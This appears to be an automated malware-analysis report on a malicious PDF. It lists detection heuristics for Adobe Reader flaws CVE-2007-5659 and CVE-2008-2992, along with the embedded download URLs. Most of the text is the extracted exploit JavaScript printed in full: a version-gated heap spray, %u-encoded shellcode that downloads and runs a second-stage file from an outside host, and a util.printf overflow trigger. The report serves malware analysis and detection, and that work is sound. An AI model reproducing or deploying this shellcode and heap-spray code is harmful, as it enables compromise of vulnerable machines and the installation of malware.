Verdict: MALICIOUS
Risk Score: 430
Malware Insights
MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
This PDF file contains embedded JavaScript that exploits multiple Adobe Reader vulnerabilities, specifically CVE-2007-5659 and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URLs http://zzz.free.hostindianet.com/load.php?id=5 and http://zzz.free.hostindianet.com/load.php?id=4. The ML classifier strongly indicates maliciousness, and the extracted JavaScript exploit kit confirms the exploitation attempt.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (10)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 (critical; CVE exact; rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical; CVE likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://zzz.free.hostindianet.com/load.php?id=5 (referenced by PDF JavaScript)
  - http://zzz.free.hostindianet.com/load.php?id=4 (referenced by PDF JavaScript)
Extracted artifacts (4)
Files carved from inside the sample during analysis.

| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0009_000.js | 9d5546825f08372aa9ced46764bcc73ac2edc143d5cfe55d921c35408cda2dfc | pdf-javascript-stream | PDF /JS object 9 at offset 0x6D4 | 55734 bytes |

Detection (javascript_obj0009_000.js)
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
eval(unescape('%u0076%u0061%u0072%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u0020%u003d%u0020%u0061%u0070%u0070%u002e%u0076%u0069%u0065%u0077%u0065%u0072%u0056%u0065%u0072%u0073%u0069%u006f%u006e%u002e%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u003b%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u0020%u003d%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0044%u002f%u0067%u002c%u0022%u0022%u0029%u003b%u0069%u0066%u0028%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u0028%u0030%u0029%u0020%u003d%u003d%u0020%u0022%u0038%u0022%u0020%u0026%u0026%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u0028%u0031%u0029%u0020%u003c%u003d%u0020%u0022%u0031%u0022%u0020%u0026%u0026%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u0028%u0032%u0029%u0020%u003c%u003d%u0020%u0022%u0032%u0022%u0029%u007b%u0076%u005a%u0061%u0053%u0030%u0041%u0069%u0041%u0048%u0020%u003d%u0020%u0075%u006e%u0065%u0073%u0063%u0061%u0070%u0065%u0028%u0022%u0025%u0075%u0035%u0033%u0035%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0032%u0035%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0037%u0035%u0036%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0039%u0063%u0035%u0035%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0065%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0064%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0065%u0064%u0038%u0033%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0033%u0031%u0030%u0064%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0036%u0034%u0063%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0030%u0030%u0033%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0037%u0038%u0033%u0030%u0022%u0020%u002b%u0020%u0022%u002
5%u0075%u0038%u0062%u0030%u0063%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0063%u0034%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0037%u0030%u0038%u0062%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0061%u0064%u0031%u0063%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0030%u0038%u0062%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0065%u0062%u0030%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0062%u0030%u0039%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0033%u0034%u0034%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0030%u0038%u0064%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0062%u0037%u0063%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0033%u0063%u0034%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0037%u0035%u0036%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0065%u0062%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0031%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0062%u0066%u0065%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0031%u0034%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0065%u0066%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0064%u0036%u0065%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0066%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0039%u0035%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0031%u0065%u0061%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0065%u0063%u0032%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0032%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0030%u0036%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0066%u0066%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0065%
u0039%u0035%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%
... (truncated)

| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| generic_stage_recovery_000.js | 983a0ed5a3982f1dde2ff9cc336ec0b750d90fda16887b87f908cab9d78a1a9a | deobfuscated-js | generic stage recovery js-unescape-u-words -> null-collapse from JavaScript object 9 at offset 0x6D4 | 9286 bytes |

Detection (generic_stage_recovery_000.js)
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var gk7hl62n9 = app.viewerVersion.toString();gk7hl62n9 = gk7hl62n9.replace(/\D/g,"");if(gk7hl62n9.charAt(0) == "8" && gk7hl62n9.charAt(1) <= "1" && gk7hl62n9.charAt(2) <= "2"){vZaS0AiAH = unescape("%u5350" + "%u5251" + "%u5756" + "%u9c55" + "%u00e8" + "%u0000" + "%u5d00" + "%ued83" + "%u310d" + "%u64c0" + "%u4003" + "%u7830" + "%u8b0c" + "%u0c40" + "%u708b" + "%uad1c" + "%u408b" + "%ueb08" + "%u8b09" + "%u3440" + "%u408d" + "%u8b7c" + "%u3c40" + "%u5756" + "%u5ebe" + "%u0001" + "%u0100" + "%ubfee" + "%u014e" + "%u0000" + "%uef01" + "%ud6e8" + "%u0001" + "%u5f00" + "%u895e" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u0263" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%u78c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u026e" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%ua6c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u9d00" + "%u5f5d" 
+ "%u5a5e" + "%u5b59" + "%uc358" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u6547" + "%u5474" + "%u6d65" + "%u5070" + "%u7461" + "%u4168" + "%u4c00" + "%u616f" + "%u4c64" + "%u6269" + "%u6172" + "%u7972" + "%u0041" + "%u6547" + "%u5074" + "%u6f72" + "%u4163" + "%u6464" + "%u6572" + "%u7373" + "%u5700" + "%u6e69" + "%u7845" + "%u6365" + "%ubb00" + "%uf289" + "%uf789" + "%uc030" + "%u75ae" + "%u29fd" + "%u89f7" + "%u31f9" + "%ubec0" + "%u003c" + "%u0000" + "%ub503" + "%u021b" + "%u0000" + "%uad66" + "%u8503" + "%u021b" + "%u0000" + "%u708b" + "%u8378" + "%u1cc6" + "%ub503" + "%u021b" + "%u0000" + "%ubd8d" + "%u021f" + "%u0000" + "%u03ad" + "%u1b85" + "%u0002" + "%uab00" + "%u03ad" + "%u1b85" + "%u0002" + "%u5000" + "%uadab" + "%u8503" + "%u021b" + "%u0000" + "%u5eab" + "%udb31" + "%u56ad" + "%u8503" + "%u021b" + "%u0000" + "%uc689" + "%ud789" + "%ufc51" + "%ua6f3" + "%u7459" + "%u5e04" + "%ueb43" + "%u5ee9" + "%ud193" + "%u03e0" + "%u2785" + "%u0002" + "%u3100" + "%u96f6" + "%uad66" + "%ue0c1" + "%u0302" + "%u1f85" + "%u0002" + "%u8900" + "%uadc6" + "%u8503" + "%u021b" + "%u0000" + "%uebc3" + "%u0010" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u8900" + "%u1b85" + "%u0002" + "%u5600" + "%ue857" + "%uff58" + "%uffff" + "%u5e5f" + "%u01ab" + "%u80ce" + "%ubb3e" + "%u0274" + "%uedeb" + "%u55c3" + "%u4c52" + "%u4f4d" + "%u2e4e" + "%u4c44" + "%u004c" + "%u5255" + "%u444c" + "%u776f" + "%u6c6e" + "%u616f" + "%u5464" + "%u466f" + "%u6c69" + "%u4165" + "%u7000" + "%u6664" + "%u7075" + "%u2e64" + "%u7865" + "%u0065" + "%u7263" + "%u7361" + "%u2e68" + "%u6870" + "%u0070" + "%u7468" + "%u7074" + "%u2f3a" + "%u7a2f" + "%u7a7a" + "%u662e" + "%u6572" + "%u2e65" + "%u6f68" + "%u7473" + "%u6e69" + "%u6964" + "%u6e61" + "%u7465" + "%u632e" + "%u6d6f" + "%u6c2f" + "%u616f" + "%u2e64" + "%u6870" + "%u3f70" + "%u6469" + "%u353d" + "%u9000" + "");var oG61yUA7r = unescape("%u0a0a" + "%u0a0a" + "");var 
q5a9RUOA = 20 + vZaS0AiAH.length;while(oG61yUA7r.length < q5a9RUOA) oG61yUA7r += oG61yUA7r;var iLhCn
... (truncated)

| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| generic_stage_recovery_001.js | 710d1cacc30c0d2f03064fb2644fbdc07b4d64ef3320ea0e0cc97e2ca7efec86 | deobfuscated-js | generic stage recovery js-unescape-u-words -> null-collapse -> split-literal-normalize from JavaScript object 9 at offset 0x6D4 | 5861 bytes |

Detection (generic_stage_recovery_001.js)
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s) and 1 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
var gk7hl62n9 = app.viewerVersion.toString();gk7hl62n9 = gk7hl62n9.replace(/\D/g,"");if(gk7hl62n9.charAt(0) == "8" && gk7hl62n9.charAt(1) <= "1" && gk7hl62n9.charAt(2) <= "2"){vZaS0AiAH = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002" + 
"%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u7a2f%u7a7a%u662e%u6572%u2e65%u6f68%u7473%u6e69%u6964%u6e61%u7465%u632e%u6d6f%u6c2f%u616f%u2e64%u6870%u3f70%u6469%u353d%u9000");var oG61yUA7r = unescape("%u0a0a%u0a0a");var q5a9RUOA = 20 + vZaS0AiAH.length;while(oG61yUA7r.length < q5a9RUOA) oG61yUA7r += oG61yUA7r;var iLhCnzGw5T = oG61yUA7r.substring(0, q5a9RUOA);var qEhkZtQ4 = oG61yUA7r.substring(0, oG61yUA7r.length - q5a9RUOA);while(qEhkZtQ4.length + q5a9RUOA < 0x60000) qEhkZtQ4 = qEhkZtQ4 + qEhkZtQ4 + iLhCnzGw5T;var feBEmW7a = new Array();for(mETrDgiv = 0; mETrDgiv < 1200; mETrDgiv++){feBEmW7a[mETrDgiv] = qEhkZtQ4 + vZaS0AiAH}var s5aC68ws = "12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888";util.printf("%45000f", s5aC68ws);}else{var niqckFsTv = new Array();function tLMKOeTJ5b(iDyh5Iy6j, fnRZtJem){while(iDyh5Iy6j.length * 2 < fnRZtJem){iDyh5Iy6j += iDyh5Iy6j;}iDyh5Iy6j = iDyh5Iy6j.substring(0, fnRZtJem / 2);return iDyh5Iy6j;}var j9G2IucZ7 = 0x0c0c0c0c;var pyfPpbOS = 
unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0
... (truncated)

| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| generic_stage_recovery_002.js | 38c703ade5e845d0d2df7738480b2fcde42b6ee20948e614c7d8f234885217fb | deobfuscated-js | generic stage recovery js-unescape-u-words -> null-collapse -> percent-decode from JavaScript object 9 at offset 0x6D4 | 9284 bytes |

Detection (generic_stage_recovery_002.js)
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var gk7hl62n9 = app.viewerVersion.toString();gk7hl62n9 = gk7hl62n9.replace(/\D/g,"");if(gk7hl62n9.charAt(0) == "8" && gk7hl62n9.charAt(1) <= "1" && gk7hl62n9.charAt(2) <= "2"){vZaS0AiAH = unescape("%u5350" + "%u5251" + "%u5756" + "%u9c55" + "%u00e8" + "%u0000" + "%u5d00" + "%ued83" + "%u310d" + "%u64c0" + "%u4003" + "%u7830" + "%u8b0c" + "%u0c40" + "%u708b" + "%uad1c" + "%u408b" + "%ueb08" + "%u8b09" + "%u3440" + "%u408d" + "%u8b7c" + "%u3c40" + "%u5756" + "%u5ebe" + "%u0001" + "%u0100" + "%ubfee" + "%u014e" + "%u0000" + "%uef01" + "%ud6e8" + "%u0001" + "%u5f00" + "%u895e" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u0263" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%u78c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u026e" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%ua6c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u9d00" + "%u5f5d" 
+ "%u5a5e" + "%u5b59" + "%uc358" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u6547" + "%u5474" + "%u6d65" + "%u5070" + "%u7461" + "%u4168" + "%u4c00" + "%u616f" + "%u4c64" + "%u6269" + "%u6172" + "%u7972" + "%u0041" + "%u6547" + "%u5074" + "%u6f72" + "%u4163" + "%u6464" + "%u6572" + "%u7373" + "%u5700" + "%u6e69" + "%u7845" + "%u6365" + "%ubb00" + "%uf289" + "%uf789" + "%uc030" + "%u75ae" + "%u29fd" + "%u89f7" + "%u31f9" + "%ubec0" + "%u003c" + "%u0000" + "%ub503" + "%u021b" + "%u0000" + "%uad66" + "%u8503" + "%u021b" + "%u0000" + "%u708b" + "%u8378" + "%u1cc6" + "%ub503" + "%u021b" + "%u0000" + "%ubd8d" + "%u021f" + "%u0000" + "%u03ad" + "%u1b85" + "%u0002" + "%uab00" + "%u03ad" + "%u1b85" + "%u0002" + "%u5000" + "%uadab" + "%u8503" + "%u021b" + "%u0000" + "%u5eab" + "%udb31" + "%u56ad" + "%u8503" + "%u021b" + "%u0000" + "%uc689" + "%ud789" + "%ufc51" + "%ua6f3" + "%u7459" + "%u5e04" + "%ueb43" + "%u5ee9" + "%ud193" + "%u03e0" + "%u2785" + "%u0002" + "%u3100" + "%u96f6" + "%uad66" + "%ue0c1" + "%u0302" + "%u1f85" + "%u0002" + "%u8900" + "%uadc6" + "%u8503" + "%u021b" + "%u0000" + "%uebc3" + "%u0010" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u8900" + "%u1b85" + "%u0002" + "%u5600" + "%ue857" + "%uff58" + "%uffff" + "%u5e5f" + "%u01ab" + "%u80ce" + "%ubb3e" + "%u0274" + "%uedeb" + "%u55c3" + "%u4c52" + "%u4f4d" + "%u2e4e" + "%u4c44" + "%u004c" + "%u5255" + "%u444c" + "%u776f" + "%u6c6e" + "%u616f" + "%u5464" + "%u466f" + "%u6c69" + "%u4165" + "%u7000" + "%u6664" + "%u7075" + "%u2e64" + "%u7865" + "%u0065" + "%u7263" + "%u7361" + "%u2e68" + "%u6870" + "%u0070" + "%u7468" + "%u7074" + "%u2f3a" + "%u7a2f" + "%u7a7a" + "%u662e" + "%u6572" + "%u2e65" + "%u6f68" + "%u7473" + "%u6e69" + "%u6964" + "%u6e61" + "%u7465" + "%u632e" + "%u6d6f" + "%u6c2f" + "%u616f" + "%u2e64" + "%u6870" + "%u3f70" + "%u6469" + "%u353d" + "%u9000" + "");var oG61yUA7r = unescape("%u0a0a" + "%u0a0a" + "");var 
q5a9RUOA = 20 + vZaS0AiAH.length;while(oG61yUA7r.length < q5a9RUOA) oG61yUA7r += oG61yUA7r;var iLhCn
... (truncated)